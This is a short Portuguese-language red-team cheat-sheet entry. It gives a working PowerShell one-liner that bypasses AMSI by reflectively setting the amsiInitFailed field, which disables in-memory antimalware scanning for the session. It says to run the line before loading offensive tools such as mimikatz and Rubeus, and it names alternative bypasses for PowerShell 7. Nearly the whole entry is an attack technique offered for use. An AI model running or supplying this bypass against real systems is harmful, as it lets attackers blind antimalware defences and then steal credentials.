AMSI bypass PowerShell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Desativa o AMSI na sessão atual do PowerShell: cargas posteriores não são escaneadas pelo antimalware em memória.
Execute no início da sua sessão do PowerShell, antes de carregar ferramentas em memória (mimikatz, Rubeus, scripts de enumeração). O one-liner define amsiInitFailed como true e o AMSI deixa de analisar os scriptblocks dessa sessão.
AMSI é apenas uma camada: o EDR com hooks em amsi.dll ou telemetria de kernel detecta o bypass ou o comportamento posterior. No PowerShell 7 (.NET Core), o campo amsiInitFailed não existe da mesma forma: use o bypass por registro ou um patchless.